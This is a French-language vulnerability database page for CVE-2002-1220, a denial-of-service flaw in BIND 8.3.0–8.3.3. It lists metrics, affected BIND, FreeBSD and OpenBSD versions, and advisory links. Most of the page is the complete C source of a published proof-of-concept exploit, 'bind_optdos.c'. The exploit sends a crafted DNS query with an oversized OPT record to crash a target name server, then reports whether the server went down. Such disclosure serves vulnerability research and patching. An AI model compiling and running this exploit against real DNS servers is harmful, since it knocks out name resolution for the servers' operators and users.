CVE-2002-1220 : Détail

CVE-2002-1220

32.63%V3
Network
2004-09-01
02h00 +00:00
2004-08-03
22h00 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

BIND 8.3.x through 8.3.3 allows remote attackers to cause a denial of service (termination due to assertion failure) via a request for a subdomain that does not exist, with an OPT resource record with a large UDP payload size.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 22011

Date de publication : 2002-11-11 23h00 +00:00
Auteur : spybreak
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/6161/info ISC BIND is vulnerable to a denial of service attack. When a DNS lookup is requested on a non-existant sub-domain of a valid domain and an OPT resource record with a large UDP payload is attached, the server may fail. /* * * bind_optdos.c * * OPT DoS Remote Exploit for BIND 8.3.0 - 8.3.3-REL * Based on the bug disclosed by ISS * * (c) Spybreak (spybreak@host.sk) November/2002 * * Proof of concept exploit code * For educational and testing purposes only! * * * Usage: ./bind_optdos domain target [udp_size] * * domain - should be a nonexistent subdomain * of an existing one, different from the target's, * or a domain whose authoritative name servers are * unreachable * * * Greetz to: sd, g00bER and hysteria.sk ;-) * */ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <signal.h> #include <time.h> #define UDP_SIZE 65535 #define OPT 41 #define PORT 53 #define MAXRESP 1024 #define TIMEOUT 10 typedef struct { unsigned short rcode : 4; unsigned short zero : 3; unsigned short ra : 1; unsigned short rd : 1; unsigned short tc : 1; unsigned short aa : 1; unsigned short opcode : 4; unsigned short qr : 1; } MSG_FLAGS; typedef struct { unsigned short id; unsigned short flags; unsigned short nqst; unsigned short nansw; unsigned short nauth; unsigned short nadd; } DNS_MSG_HDR; void usage(char *argv0) { printf("********************************************\n" "* OPT DoS Exploit for BIND 8.3.[0-3] *\n" "* (c) Spybreak November/2002 *\n" "********************************************\n"); printf("\n%s domain target [udp_size]\n\n", argv0); exit(0); } void sig_alrm(int signo) { printf("No response yet, the target BIND seems to be down\n"); exit(0); } main(int argc, char **argv) { struct sockaddr_in targ_addr; struct hostent *he; MSG_FLAGS fl; DNS_MSG_HDR hdr; unsigned char qname[512], buff[1024]; unsigned char *bu, *dom, *dot; int msg_size, dom_len, sockfd, n; unsigned short udp_size = UDP_SIZE; char response[MAXRESP + 1]; if (argc < 3) usage(argv[0]); if (argc == 4) udp_size = (unsigned short) atoi(argv[3]); if (!(he = gethostbyname(argv[2]))) { printf("Invalid target '%s'\n", argv[2]); exit(-1); } printf("Query on domain: %s\nTarget: %s\n", argv[1], argv[2]); printf("EDNS UDP size: %u\n", udp_size); if (argv[1][strlen(argv[1]) - 1] == '.') argv[1][strlen(argv[1]) - 1] = '\0'; strncpy(qname + 1, argv[1], sizeof(qname) - 2); dom = qname; while (dot = (unsigned char *) strchr(dom + 1, '.')) { *dom = dot - dom - 1; dom = dot; } *dom = strlen(dom + 1); dom_len = dom - qname + strlen(dom + 1) + 2; bu = buff; fl.qr = 0; fl.opcode = 0; fl.aa = 0; fl.tc = 0; fl.rd = 1; fl.ra = 0; fl.zero = 0; fl.rcode = 0; srand(time(0)); hdr.id = htons((unsigned short) (65535.0*rand()/(RAND_MAX+1.0)) + 1); hdr.flags = htons(*((unsigned short *) &fl)); hdr.nqst = htons(1); hdr.nansw = 0; hdr.nauth = 0; hdr.nadd = htons(1); bcopy(&hdr, bu, sizeof(hdr)); bu += sizeof(hdr); bcopy(qname, bu, dom_len); bu += dom_len; *(((unsigned short *) bu)++) = htons(1); //query type *(((unsigned short *) bu)++) = htons(1); //query class //opt rr *bu++ = '\0'; *(((unsigned short *) bu)++) = htons(OPT); //type *(((unsigned short *) bu)++) = htons(udp_size); //udp payload size *(((unsigned int *) bu)++) = htons(0); //extended rcode and flags *(((unsigned short *) bu)++) = htons(0); //rdlen msg_size = bu - buff; bzero(&targ_addr, sizeof(targ_addr)); targ_addr.sin_family = AF_INET; targ_addr.sin_port = htons(PORT); targ_addr.sin_addr = *(struct in_addr *) he->h_addr; sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd < 0) { perror("socket"); exit(-1); } n = sendto(sockfd, buff, msg_size, 0, (struct sockaddr *) &targ_addr, (socklen_t) sizeof(targ_addr)); if (n < 0) { perror("sendto"); exit(-1); } printf("Datagram sent\nWaiting for response ...\n"); signal(SIGALRM, sig_alrm); alarm(TIMEOUT); n = recvfrom(sockfd, response, MAXRESP, 0, NULL, NULL); alarm(0); printf("Response received, the target BIND seems to be still up\n"); printf("Maybe the target is not an OPT DoS vulnerable BIND version,recursion disabled, or try to change domain/udp_size, ...\n"); exit(0); }

Products Mentioned

Configuraton 0

Isc>>Bind >> Version 8.3.0

Isc>>Bind >> Version 8.3.1

Isc>>Bind >> Version 8.3.2

Isc>>Bind >> Version 8.3.3

Configuraton 0

Freebsd>>Freebsd >> Version 4.4

Freebsd>>Freebsd >> Version 4.5

Freebsd>>Freebsd >> Version 4.6

Freebsd>>Freebsd >> Version 4.7

Openbsd>>Openbsd >> Version 3.0

Openbsd>>Openbsd >> Version 3.1

Openbsd>>Openbsd >> Version 3.2

Références

http://www.cert.org/advisories/CA-2002-31.html
Tags : third-party-advisory, x_refsource_CERT
http://www.debian.org/security/2002/dsa-196
Tags : vendor-advisory, x_refsource_DEBIAN
http://online.securityfocus.com/advisories/4999
Tags : vendor-advisory, x_refsource_COMPAQ
http://marc.info/?l=bugtraq&m=103763574715133&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/229595
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/6161
Tags : vdb-entry, x_refsource_BID
http://online.securityfocus.com/archive/1/300019
Tags : mailing-list, x_refsource_BUGTRAQ
http://marc.info/?l=bugtraq&m=103713117612842&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.ciac.org/ciac/bulletins/n-013.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-077.php
Tags : vendor-advisory, x_refsource_MANDRAKE